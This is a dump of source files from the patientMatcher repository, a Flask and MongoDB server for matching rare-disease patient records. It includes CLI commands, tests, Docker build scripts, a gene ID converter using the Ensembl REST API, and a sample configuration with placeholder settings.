create_app\nfrom .add import add\nfrom .remove import remove\nfrom .update import update\nfrom patientMatcher import __version__\n\n\[email protected]_option(__version__)\[email protected](cls=FlaskGroup, create_app=create_app, invoke_without_command=False, add_default_commands=True,\n add_version_option=False)\ndef cli(**_):\n \"\"\"Base command for invoking the command line\"\"\"\n pass\n\[email protected]()\ndef test():\n \"\"\"Test server using CLI\"\"\"\n pass\n\n\[email protected]()\n@with_appcontext\ndef name():\n \"\"\"Returns the app name, for testing purposes, mostly\"\"\"\n app_name = current_app.name.split('.')[0]\n click.echo(app_name)\n return app_name\n\n\[email protected]()\n@with_appcontext\[email protected]('-recipient', type=click.STRING, nargs=1, required=True, help=\"Email address to send the test email to\")\ndef email(recipient):\n \"\"\"Sends a test email using config settings\"\"\"\n click.echo(recipient)\n\n subj = 'Test email from patientMatcher'\n body = \"\"\"\n ***This is an automated message, please do not reply to this email.***<br><br>\n If you receive this email it means that email settings are working fine and the\n server will be able to send match notifications.<br>\n A mail notification will be sent when:<br>\n <ul>\n <li>A patient is added to the database and the add request triggers a search\n on external nodes producing at least one result (/patient/add endpoint).</li>\n\n <li>An external search is actively performed on connected nodes and returns\n at least one result (/match/external/<patient_id> endpoint).</li>\n\n <li>The server is interrogated by an external node and returns at least one\n result match (/match endpoint). In this case a match notification is sent to\n each contact of the result matches.</li>\n\n <li>An internal search is submitted to the server using a patient from the\n database (/match endpoint) and this search returns at least one match.\n In this case contact users of all patients involved will be notified\n (contact from query patient and contacts from the result patients).</li>\n </ul>\n <br>\n You can stop server notification any time by commenting the MAIL_SERVER parameter in\n config file and rebooting the server.\n <br><br>\n Kind regards,<br>\n The PatientMatcher team\n \"\"\"\n kwargs = dict(subject=subj, html=body, sender=current_app.config.get('MAIL_USERNAME'), recipients=[recipient])\n message = Message(**kwargs)\n try:\n current_app.mail.send(message)\n click.echo('Mail correctly sent. Check your inbox!')\n except Exception as err:\n click.echo('An error occurred while sending test email: \"{}\"'.format(err))\n\ncli.add_command(test)\ntest.add_command(name)\ntest.add_command(email)\ncli.add_command(add)\ncli.add_command(update)\ncli.add_command(remove)\n" }, { "alpha_fraction": 0.6538719534873962, "alphanum_fraction": 0.6588377356529236, "avg_line_length": 36.82233428955078, "blob_id": "4e5c9c86c1a3beb27c8611e1cd38b5fd30d6fbaa", "content_id": "a805a4a3598b7844e061f346d8fe205f5703149d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7451, "license_type": "permissive", "max_line_length": 117, "num_lines": 197, "path": "/tests/cli/test_commands.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pymongo\nfrom flask_mail import Message\n\nfrom patientMatcher.cli.commands import cli\nfrom patientMatcher.parse.patient import mme_patient\n\ndef test_appname(mock_app):\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['test', 'name'])\n assert result.output == 'patientMatcher\\n'\n\n\ndef test_sendemail(mock_app, mock_mail):\n mock_app.mail = mock_mail\n mock_app.config['MAIL_USERNAME'] = '[email protected]'\n\n runner = mock_app.test_cli_runner()\n # When invoking the test email command with a recipient paramrter\n result = runner.invoke(cli, ['test', 'email', '-recipient', '[email protected]'])\n\n # Make sure that mock mail send method was called and mock email is sent\n assert mock_mail._send_was_called\n assert mock_mail._message\n assert 'Mail correctly sent' in result.output\n\n\ndef test_cli_add_node(mock_app, database, test_node):\n # make sure that \"nodes\" collection is empty\n assert database['nodes'].find_one() is None\n\n # test add a server using the app cli\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['add', 'node', '-id', test_node['_id'],\n '-label', 'This is a test node', '-token', test_node['auth_token'],\n '-matching_url', test_node['matching_url'],'-accepted_content',\n test_node['accepted_content']])\n assert result.exit_code == 0\n assert 'Inserted node' in result.output\n\n # check that the server was added to the \"nodes\" collection\n assert database['nodes'].find_one()\n\n # Try adding the node again\n result = runner.invoke(cli, ['add', 'node', '-id', test_node['_id'],\n '-label', 'This is a test node', '-token', test_node['auth_token'],\n '-matching_url', test_node['matching_url'],'-accepted_content',\n test_node['accepted_content']])\n assert result.exit_code == 0\n # And you should get an abort message\n assert 'Aborted' in result.output\n # And number of nodes in database should stay the same\n results = database['nodes'].find()\n assert len(list(results)) == 1\n\ndef test_cli_add_client(mock_app, database, test_client):\n\n # make sure that \"clients\" collection is empty\n assert database['client'].find_one() is None\n\n # test add a server using the app cli\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['add', 'client', '-id', test_client['_id'],\n '-token', test_client['auth_token'], '-url', test_client['base_url']])\n\n assert result.exit_code == 0\n assert 'Inserted client' in result.output\n\n # check that the server was added to the \"nodes\" collection\n assert database['clients'].find_one()\n\n # Try adding the client again\n result = runner.invoke(cli, ['add', 'client', '-id', test_client['_id'],\n '-token', test_client['auth_token'], '-url', test_client['base_url']])\n assert result.exit_code == 0\n # And you should get an abort message\n assert 'Aborted' in result.output\n # And number of clients in database should stay the same\n results = database['clients'].find()\n assert len(list(results)) == 1\n\n\ndef test_cli_remove_client(mock_app, database, test_client):\n\n # Add a client to database\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['add', 'client', '-id', test_client['_id'],\n '-token', test_client['auth_token'], '-url', test_client['base_url']])\n assert result.exit_code == 0\n\n # check that the server was added to the \"nodes\" collection\n assert database['clients'].find_one()\n\n # Use the cli to remove client\n result = runner.invoke(cli, ['remove', 'client', '-id', test_client['_id'] ])\n\n # check that command is executed withour errors\n assert result.exit_code == 0\n\n # and that client is gone from database\n assert database['clients'].find_one() is None\n\n\ndef test_cli_remove_node(mock_app, database, test_node):\n\n # Add a node to database\n runner = mock_app.test_cli_runner()\n result = runner.invoke(cli, ['add', 'node', '-id', test_node['_id'],\n '-label', 'This is a test node', '-token', test_node['auth_token'],\n '-matching_url', test_node['matching_url'],'-accepted_content',\n test_node['accepted_content']])\n assert result.exit_code == 0\n\n # check that the server was added to the \"nodes\" collection\n assert database['nodes'].find_one()\n\n # Use the cli to remove client\n result = runner.invoke(cli, ['remove', 'node', '-id', test_node['_id'] ])\n\n # check that command is executed withour errors\n assert result.exit_code == 0\n\n # and that node is gone from database\n assert database['nodes'].find_one() is None\n\n\ndef test_cli_update_resources(mock_app):\n\n runner = mock_app.test_cli_runner()\n\n # run resources update command with --test flag:\n result = runner.invoke(cli, ['update', 'resources'])\n assert result.exit_code == 0\n\n\ndef test_cli_add_demo_data(mock_app, database):\n\n runner = mock_app.test_cli_runner()\n\n # make sure that \"patients\" collection is empty\n assert database['patients'].find_one() is None\n\n # run the load demo command without the -compute_phenotypes flag\n result = runner.invoke(cli, ['add', 'demodata'])\n assert result.exit_code == 0\n\n # check that the 50 demo patients where inserted into database\n results = database['patients'].find()\n assert len(list(results)) == 50\n\n\ndef test_cli_remove_patient(mock_app, database, gpx4_patients, match_objs):\n\n runner = mock_app.test_cli_runner()\n\n # add a test patient to database\n test_patient = mme_patient(gpx4_patients[0], True) # True --> convert gene symbols to ensembl\n inserted_id = mock_app.db['patients'].insert_one(test_patient).inserted_id\n assert inserted_id == gpx4_patients[0]['id']\n\n # there is now 1 patient in database\n assert database['patients'].find_one()\n\n # test that without a valid id or label no patient is removed\n result = runner.invoke(cli, ['remove', 'patient', '-id', '', '-label', ''])\n assert 'Error' in result.output\n\n # Add mock patient matches objects to database\n database['matches'].insert_many(match_objs)\n # There should be 2 matches in database for this patient:\n results = database['matches'].find( {'data.patient.id' : inserted_id })\n assert len(list(results)) == 2\n\n # involke cli command to remove the patient by id and label\n result = runner.invoke(cli, ['remove', 'patient', '-id', inserted_id, '-label', '350_1-test', '-leave_matches'])\n assert result.exit_code == 0\n\n # check that the patient was removed from database\n assert database['patients'].find_one() is None\n\n # But matches are still there\n results = database['matches'].find( {'data.patient.id' : inserted_id })\n assert len(list(results)) == 2\n\n # Run remove patient command with option to remove matches but without patient ID\n result = runner.invoke(cli, ['remove', 'patient', '-label', '350_1-test', '-remove_matches'])\n # And make sure that it doesn't work\n assert 'Please provide patient ID and not label to remove all its matches.' in result.output\n\n # Test now the proper command to remove patient matches:\n result = runner.invoke(cli, ['remove', 'patient', '-id', inserted_id, '-remove_matches'])\n assert result.exit_code == 0\n\n # And make sure that patient removal removed its matchings\n assert database['matches'].find_one( {'data.patient.id' : inserted_id }) is None\n" }, { "alpha_fraction": 0.645765483379364, "alphanum_fraction": 0.6506514549255371, "avg_line_length": 36.212120056152344, "blob_id": "c8c1cc60fee85097e00e03ade72382113b123ea5", "content_id": "5e99484a2ce3c14070fabed41f1c09a6db08aa9a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1228, "license_type": "permissive", "max_line_length": 149, "num_lines": 33, "path": "/docker/update_env.sh", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/bin/bash -e\n\nDIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\n# We're running this inside the previously built container to ensure\n# the OS/container environment matches what it will be run in.\n\nif [[ -z $INSIDE_THE_CONTAINER ]]; then\n docker run -e INSIDE_THE_CONTAINER=1 \\\n -v $DIR/..:/opt/patientMatcher \\\n --rm \\\n -it \\\n --entrypoint /opt/patientMatcher/docker/update_env.sh \\\n local/patientmatcher\nelse\n export DOCKER_CONDA_PREFIX=/opt/conda/envs/patientMatcher\n export DOCKER_ENV_NAME=patientMatcher\n TEMP_ENV_NAME=\"temp-${DOCKER_ENV_NAME}\"\n PYTHON_VERSION=3.6.8\n\n # conda functions don't get exported to subshells, so source it\n source /opt/conda/etc/profile.d/conda.sh\n\n conda create -y --name $TEMP_ENV_NAME python=${PYTHON_VERSION}\n conda activate $TEMP_ENV_NAME\n conda install git -y\n pip install -r $DIR/../requirements.txt -r $DIR/../requirements-dev.txt\n conda env export --no-builds \\\n | perl -wlne 'if ($. == 1){print \"name: $ENV{DOCKER_ENV_NAME}\"} elsif (/^prefix:/){print \"prefix: $ENV{DOCKER_CONDA_PREFIX}\"} else {print}' \\\n > $DIR/conda_env.yml\n conda deactivate\n conda env remove --name $TEMP_ENV_NAME\nfi\n" }, { "alpha_fraction": 0.6524300575256348, "alphanum_fraction": 0.692194402217865, "avg_line_length": 28.521739959716797, "blob_id": "7a884e8e5d54da7bd614a2bb2d6e4b668d569a6e", "content_id": "b442ffd2b5e788c3e8588a1985e29ed45944b52f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 679, "license_type": "permissive", "max_line_length": 92, "num_lines": 23, "path": "/tests/utils/test_gene.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom patientMatcher.utils.gene import entrez_to_symbol, ensembl_to_symbol, symbol_to_ensembl\n\ndef test_ensembl_to_symbol():\n # Test converting ensembl ID to official gene symbol\n\n ensembl_id = 'ENSG00000103591'\n symbol = ensembl_to_symbol(ensembl_id)\n assert symbol == 'AAGAB'\n\ndef test_symbol_to_ensembl():\n # Test converting official gene symbol to ensembl ID\n\n symbol = 'AAGAB'\n ensembl_id = symbol_to_ensembl(symbol)\n assert ensembl_id == 'ENSG00000103591'\n\ndef test_entrez_to_symbol():\n # Test converting entrez ID to gene symbol\n entrez_id = \"3735\"\n symbol = entrez_to_symbol(entrez_id)\n assert symbol == 'KARS'\n" }, { "alpha_fraction": 0.7495495676994324, "alphanum_fraction": 0.7627627849578857, "avg_line_length": 40.625, "blob_id": "d94d4928775034d0473f7ef710bfc0d8e80fd7c0", "content_id": "dc98900f37cdff5696ed1091558ed8b63f1203fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1665, "license_type": "permissive", "max_line_length": 464, "num_lines": 40, "path": "/patientMatcher/instance/config.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#Turns on debugging features in Flask\nDEBUG = True\n\n#secret key:\nSECRET_KEY = 'MySuperSecretKey'\n\n# Database connection string\nDB_USERNAME = 'pmUser'\nDB_PASSWORD = 'pmPassword'\nDB_NAME = 'pmatcher'\nDB_HOST = '127.0.0.1'\nDB_PORT = 27017\nDB_URI = \"mongodb://{}:{}@{}:{}/{}\".format(DB_USERNAME, DB_PASSWORD, DB_HOST, DB_PORT, DB_NAME)\n\n# Matching Algorithms scores\n# sum of MAX_GT_SCORE and MAX_PHENO_SCORE should be 1\nMAX_GT_SCORE = 0.75\nMAX_PHENO_SCORE = 0.25\n\n# Max results matches returned by server.\nMAX_RESULTS = 5\n\n# Set a minimum patient score threshold for returned results\n# Set this parameter to 0 to return all results with a score higher than 0\nSCORE_THRESHOLD = 0\n\n# Disclaimer. This text is returned along with match results or server metrics\nDISCLAIMER = 'patientMatcher provides data in good faith as a research tool. patientMatcher makes no warranty nor assumes any legal responsibility for any purpose for which the data are used. Users should not attempt in any case to identify patients whose data is returned by the service. Users who intend to publish paper using this software should acknowldge patientMatcher and its developers (https://www.scilifelab.se/facilities/clinical-genomics-stockholm/).'\n\n# Email notification params.\n# Required only if you want to send match notifications to patients contacts\n#MAIL_SERVER = mail_port\n#MAIL_PORT = email_port\n#MAIL_USE_SSL = True or False\n#MAIL_USERNAME = '[email protected]'\n#MAIL_PASSWORD = 'mail_password'\n\n# Set NOTIFY_COMPLETE to False if you don't want to notify variants and phenotypes by email\n# This way only contact info and matching patients ID will be notified in email body\n#NOTIFY_COMPLETE = True\n" }, { "alpha_fraction": 0.7561349868774414, "alphanum_fraction": 0.7561349868774414, "avg_line_length": 33.31578826904297, "blob_id": "f798200dab72baeb0e888e9ad68bc114e380606e", "content_id": "4663cea82123849466e1d3b48e3ee17b3d3938aa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "permissive", "max_line_length": 81, "num_lines": 19, "path": "/patientMatcher/resources/__init__.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "import pkg_resources\n\n###### Files ######\nhpo_filename = 'resources/hp.obo.txt'\nphenotype_annotation_filename = 'resources/phenotype_annotation.tab.txt'\nbenchmark_patients = 'resources/benchmark_patients.json'\njson_api ='resources/api.json'\n\n###### Paths ######\npath_to_hpo_terms = pkg_resources.resource_filename('patientMatcher',\n hpo_filename)\n\npath_to_phenotype_annotations = pkg_resources.resource_filename('patientMatcher',\n phenotype_annotation_filename)\n\npath_to_benchmark_patients = pkg_resources.resource_filename('patientMatcher',\n benchmark_patients)\n\npath_to_json_api = pkg_resources.resource_filename('patientMatcher', json_api)\n" }, { "alpha_fraction": 0.5786627531051636, "alphanum_fraction": 0.6037364602088928, "avg_line_length": 29.81818199157715, "blob_id": "3bcf6908f8c8afc544d5db0915a4e6152d982fe7", "content_id": "55dc68e57b96556f885ce2394ab27803b75e9b9b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2034, "license_type": "permissive", "max_line_length": 83, "num_lines": 66, "path": "/patientMatcher/utils/ensembl_rest_client.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport json\nimport logging\nimport requests\nfrom urllib.error import HTTPError\nfrom urllib.parse import urlencode\nfrom urllib.request import Request, urlopen\n\nLOG = logging.getLogger(__name__)\n\nHEADERS = {'Content-type':'application/json'}\nRESTAPI_37 = 'https://grch37.rest.ensembl.org'\nRESTAPI_38 = 'https://rest.ensembl.org/'\nPING_ENDPOINT = 'info/ping'\n\nclass EnsemblRestApiClient:\n \"\"\"A class handling requests and responses to and from the Ensembl REST APIs.\n Endpoints for human build 37: https://grch37.rest.ensembl.org\n Endpoints for human build 38: http://rest.ensembl.org/\n Documentation: https://github.com/Ensembl/ensembl-rest/wiki\n doi:10.1093/bioinformatics/btu613\n \"\"\"\n\n def __init__(self, build='37'):\n if build == '38':\n self.server = RESTAPI_38\n else:\n self.server = RESTAPI_37\n\n def ping_server(self, server=RESTAPI_38):\n \"\"\"ping ensembl\n\n Accepts:\n server(str): default is 'https://grch37.rest.ensembl.org'\n\n Returns:\n data(dict): dictionary from json response\n \"\"\"\n url = '/'.join([server, PING_ENDPOINT])\n data = self.send_request(url)\n return data\n\n\n def send_request(self, url):\n \"\"\"Sends the actual request to the server and returns the response\n\n Accepts:\n url(str): ex. https://grch37.rest.ensembl.org/lookup/id/ENSG00000103591\n\n Returns:\n data(dict): dictionary from json response\n \"\"\"\n data = {}\n try:\n request = Request(url, headers=HEADERS)\n response = urlopen(request)\n content = response.read()\n if content:\n data = json.loads(content)\n except HTTPError as e:\n LOG.info('Request failed for url {0}: Error: {1}\\n'.format(url, e))\n data = e\n except ValueError as e:\n LOG.info('Request failed for url {0}: Error: {1}\\n'.format(url, e))\n data = e\n return data\n" }, { "alpha_fraction": 0.6335443258285522, "alphanum_fraction": 0.6512657999992371, "avg_line_length": 29.384614944458008, "blob_id": "1d74c3f3a1e0405b93e4447c7ec796064c346746", "content_id": "efe0c074d048b6fa7ae0fe53ecb9e90a2aad7a0f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1580, "license_type": "permissive", "max_line_length": 99, "num_lines": 52, "path": "/patientMatcher/utils/gene.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport logging\nimport patientMatcher.utils.ensembl_rest_client as ensembl_client\n\ndef entrez_to_symbol(entrez_id):\n \"\"\"Convert entrez id to gene symbol\n\n Accepts:\n entrez_id(str) ex. \"3735\"\n\n Returns\n gene_symbol(str) ex. BRAF\n \"\"\"\n client = ensembl_client.EnsemblRestApiClient()\n url = ''.join([client.server, '/xrefs/name/human/', entrez_id, '?external_db=EntrezGene'])\n results = client.send_request(url)\n for gene in results: # result is an array. First element is enough\n return gene['display_id']\n\n\ndef symbol_to_ensembl(gene_symbol):\n \"\"\"Convert gene symbol to ensembl id\n\n Accepts:\n gene_symbol(str) ex. LIMS2\n\n Returns:\n ensembl_id(str) ex. ENSG00000072163\n \"\"\"\n client = ensembl_client.EnsemblRestApiClient()\n url = ''.join([client.server, '/xrefs/symbol/homo_sapiens/', gene_symbol, '?external_db=HGNC'])\n results = client.send_request(url)\n for gene in results: # result is an array. First element is enough\n if gene['id'].startswith('ENSG'): # it's the ensembl id\n return gene['id']\n\n\ndef ensembl_to_symbol(ensembl_id):\n \"\"\"Converts ensembl id to gene symbol\n\n Accepts:\n ensembl_id(str): an ensembl gene id. Ex: ENSG00000103591\n\n Returns:\n gene_symbol(str): an official gene symbol. Ex: AAGAB\n \"\"\"\n\n client = ensembl_client.EnsemblRestApiClient()\n url = ''.join([client.server, '/lookup/id/', ensembl_id])\n result = client.send_request(url)\n return result.get('display_name', None)\n" }, { "alpha_fraction": 0.6783965826034546, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 40.89743423461914, "blob_id": "61b62482f15175b94bb6328e50ce92847ec66ec1", "content_id": "6cd4e4d6c9ce4af0790635369cb785c7489c2aa8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3268, "license_type": "permissive", "max_line_length": 161, "num_lines": 78, "path": "/patientMatcher/cli/add.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport click\nimport datetime\nfrom flask.cli import with_appcontext, current_app\n\nfrom patientMatcher.resources import path_to_benchmark_patients\nfrom patientMatcher.utils.add import load_demo, add_node\n\[email protected]()\ndef add():\n \"\"\"Add items to database using the CLI\"\"\"\n pass\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=True, help=\"Server ID\")\[email protected]('-label', type=click.STRING, nargs=1, required=True, help=\"Server Description\")\[email protected]('-token', type=click.STRING, nargs=1, required=True, help=\"Authorization token\")\[email protected]('-matching_url', type=click.STRING, nargs=1, required=True, help=\"URL to send match requests to\")\[email protected]('-accepted_content', type=click.STRING, nargs=1, required=True, help=\"Accepted Content-Type\", default=\"application/vnd.ga4gh.matchmaker.v1.0+json\")\[email protected]('-contact', type=click.STRING, nargs=1, required=False, help=\"An email address\")\n@with_appcontext\ndef node(id, label, token, matching_url, accepted_content, contact=None):\n \"\"\"Adds a new server to database\"\"\"\n click.echo(\"Adding a new MatchMaker node to database\")\n node_obj = {\n '_id' : id,\n 'label' : label,\n 'created' : datetime.datetime.now(),\n 'auth_token' : token,\n 'matching_url' : matching_url,\n 'accepted_content' : accepted_content,\n 'contact' : contact\n }\n inserted_id, collection = add_node(mongo_db=current_app.db, obj=node_obj, is_client=False)\n if inserted_id:\n click.echo('Inserted node with ID \"{}\" into database collection {}'.format(inserted_id, collection))\n else:\n click.echo('Aborted')\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=True, help=\"Client ID\")\[email protected]('-token', type=click.STRING, nargs=1, required=True, help=\"Authorization token\")\[email protected]('-url', type=click.STRING, nargs=1, required=True, help=\"Client URL\")\[email protected]('-contact', type=click.STRING, nargs=1, required=False, help=\"Client email\")\n@with_appcontext\ndef client(id, token, url, contact=None):\n \"\"\"Adds a new client to database\"\"\"\n click.echo(\"Adding a new client to database\")\n client_obj = {\n '_id' : id,\n 'created' : datetime.datetime.now(),\n 'auth_token' : token,\n 'base_url' : url,\n 'contact' : contact\n }\n inserted_id, collection = add_node(mongo_db=current_app.db, obj=client_obj, is_client=True)\n if inserted_id:\n click.echo('Inserted client with ID \"{}\" into database collection {}'.format(inserted_id, collection))\n else:\n click.echo('Aborted')\n\n\[email protected]()\n@with_appcontext\[email protected]('--ensembl_genes', is_flag=True, help=\"Convert gene symbols to Ensembl IDs\")\ndef demodata(ensembl_genes):\n \"\"\"Adds a set of 50 demo patients to database\"\"\"\n click.echo('Adding 50 test patients to database..')\n click.echo('ENSEMBL GENES IS {}'.format(ensembl_genes))\n inserted_ids = load_demo(path_to_json_data=path_to_benchmark_patients, mongo_db=current_app.db,\n convert_to_ensembl=ensembl_genes)\n click.echo('inserted {} patients into db'.format(len(inserted_ids)))\n\nadd.add_command(node)\nadd.add_command(client)\nadd.add_command(demodata)\n" }, { "alpha_fraction": 0.6309012770652771, "alphanum_fraction": 0.632331907749176, "avg_line_length": 24.88888931274414, "blob_id": "a9b93973e1f342d00f0cf10dcfb52a774f9f9d70", "content_id": "cfda20324da5ff6360db17af217b23ccef787547", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 699, "license_type": "permissive", "max_line_length": 82, "num_lines": 27, "path": "/patientMatcher/utils/patient.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport logging\n\nLOG = logging.getLogger(__name__)\n\ndef patients(database, ids=None):\n \"\"\"Get all patients in the database\n\n Args:\n database(pymongo.database.Database)\n ids(list): a list of IDs to return only specified patients\n\n Returns:\n results(Iterable[dict]): list of patients from mongodb patients collection\n \"\"\"\n results = None\n query = {}\n if ids: # if only specified patients should be returned\n LOG.info('Querying patients for IDs {}'.format(ids))\n query['_id'] = {'$in' : ids}\n\n else:\n LOG.info('Return all patients in database')\n\n results = database['patients'].find(query)\n return results\n" }, { "alpha_fraction": 0.7244418263435364, "alphanum_fraction": 0.727379560470581, "avg_line_length": 39.52381134033203, "blob_id": "7e74d35a0b7209fde613301c545c707236ae6c90", "content_id": "5e58575a5b550da86cbef57ebc6f9a708c8de885", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "permissive", "max_line_length": 97, "num_lines": 42, "path": "/tests/utils/test_notify.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport pymongo\nfrom patientMatcher.utils.notify import notify_match_external, notify_match_internal, html_format\n\ndef test_notify_match_external(match_objs, mock_sender, mock_mail):\n\n match_obj = match_objs[0] #an external match object with results\n assert match_obj['match_type'] == 'external'\n\n # When calling the function that sends external match notifications\n notify_complete = True # test notification of complete patient data by email\n notify_match_external(match_obj, mock_sender, mock_mail, notify_complete)\n\n # make sure send method was called\n assert mock_mail._send_was_called\n\n # and that mail object message was set correctly\n assert mock_mail._message\n\n\ndef test_notify_match_internal(database, match_objs, mock_sender, mock_mail):\n\n match_obj = match_objs[2] # an internal match object with results\n assert match_obj['match_type'] == 'internal'\n\n # insert patient used as query in database:\n assert database['patients'].find_one() is None\n assert database['patients'].insert_one({ '_id' : 'external_patient_1'}).inserted_id\n\n # When calling the function that sends internal match notifications\n notify_complete = False # test notification of partial patient data by email\n notify_match_internal(database, match_obj, mock_sender, mock_mail, notify_complete)\n\n # Test the function that formats the matching results to HTML:\n formatted_results = html_format(match_obj['results'])\n assert '<div style=\"margin-left: 0em\">' in formatted_results\n\n # make sure send method was called\n assert mock_mail._send_was_called\n\n # and that mail object message was set correctly\n assert mock_mail._message\n" }, { "alpha_fraction": 0.6185133457183838, "alphanum_fraction": 0.6262272000312805, "avg_line_length": 34.650001525878906, "blob_id": "a9b7ba419bb2131f36cfe5d5f8d0caf8c62e6149", "content_id": "0825374296fdbcbad53abe5a1e2c9e8c0a6e0d21", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1426, "license_type": "permissive", "max_line_length": 112, "num_lines": 40, "path": "/patientMatcher/cli/update.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom clint.textui import progress\nimport click\nfrom patientMatcher.constants import PHENOTYPE_TERMS\n\n\[email protected]()\ndef update():\n \"\"\"Update patientMatcher resources\"\"\"\n pass\n\[email protected]()\[email protected]('--test',\n help='Use this flag to test the function',\n is_flag=True)\ndef resources(test):\n \"\"\"Updates HPO terms and disease ontology from the web.\n Specifically collect files from:\n http://purl.obolibrary.org/obo/hp.obo\n http://compbio.charite.de/jenkins/job/hpo.annotations/lastStableBuild/artifact/misc/phenotype_annotation.tab\n \"\"\"\n files = {}\n for key,item in PHENOTYPE_TERMS.items():\n url = item['url']\n destination = item['resource_path']\n r = requests.get(url, stream=True)\n total_length = int(r.headers.get('content-length'))\n if test: # read file and get its size\n files[key] = total_length # create an object for each downloadable file and save its length\n if total_length:\n click.echo('file {} found at the requested URL'.format(key))\n continue\n with open(destination, 'wb') as f: #overwrite file\n for chunk in progress.bar(r.iter_content(chunk_size=1024), expected_size=(total_length/1024) + 1):\n if chunk:\n f.write(chunk)\n f.flush()\n" }, { "alpha_fraction": 0.6111897826194763, "alphanum_fraction": 0.6317280530929565, "avg_line_length": 30.377777099609375, "blob_id": "7c188d0feb7ed892e3544fab540a107b8beb8d25", "content_id": "36c0d409c620b2765f835d45609ba6ac1d9779d7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 1412, "license_type": "permissive", "max_line_length": 109, "num_lines": 45, "path": "/Dockerfile", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "FROM mongo:4.0.7-xenial\n\nSHELL [\"/bin/bash\", \"-c\"]\n\nENV LC_ALL C.UTF-8\nENV LANG C.UTF-8\nENV MONGO_PIDFILE /var/run/mongod.pid\nENV MONGO_LOGPATH /var/log/mongodb/mongod.log\n\nRUN apt-get update && apt-get install -y --no-install-recommends \\\n bzip2 \\\n ca-certificates \\\n curl \\\n libglib2.0-0 \\\n libxext6 \\\n libsm6 \\\n libxrender1 \\\n wget \\\n vim && \\\n apt-get clean\n\nWORKDIR /root\n\nENV CONDA_VERSION 4.6.14\nCOPY docker/conda_env.yml /root/conda_env.yml\nRUN wget --quiet https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \\\n /bin/bash ~/miniconda.sh -b -p /opt/conda && \\\n rm ~/miniconda.sh && \\\n ln -s /opt/conda/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \\\n echo \". /opt/conda/etc/profile.d/conda.sh\" >> ~/.bashrc && \\\n echo \"conda activate patientMatcher\" >> ~/.bashrc && \\\n source /opt/conda/etc/profile.d/conda.sh && \\\n conda install -y conda=$CONDA_VERSION && \\\n conda env create -f /root/conda_env.yml && \\\n conda clean -tipsy\n\nCOPY . /opt/patientMatcher\nWORKDIR /opt/patientMatcher\nRUN source /opt/conda/etc/profile.d/conda.sh && \\\n conda activate patientMatcher && \\\n pip install git+https://github.com/Clinical-Genomics/patient-similarity && \\\n pip install -e .\n\nENTRYPOINT [ \"docker/entrypoint.sh\" ]\nCMD [ \"pmatcher\", \"run\", \"-h\", \"0.0.0.0\", \"-p\", \"9020\" ]\n" }, { "alpha_fraction": 0.6088751554489136, "alphanum_fraction": 0.6274510025978088, "avg_line_length": 28.363636016845703, "blob_id": "9255259af3af139282477300d1890f5409b0996f", "content_id": "f39e7852260cf248b2896785b9d5f13fba904c56", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 969, "license_type": "permissive", "max_line_length": 126, "num_lines": 33, "path": "/patientMatcher/constants/__init__.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "from patientMatcher.resources import path_to_hpo_terms, path_to_phenotype_annotations\n\n# useful HTTP response status codes with messages\nSTATUS_CODES = {\n 200 : {\n 'status_code' : 200\n },\n 400 : {\n 'message' : 'Invalid request JSON'\n },\n 422 : {\n 'message' : 'Request does not conform to API specifications'\n },\n 401 : {\n 'message' : 'Not authorized'\n },\n 500 : {\n 'message' : 'An error occurred while updating the database'\n },\n}\n\n# 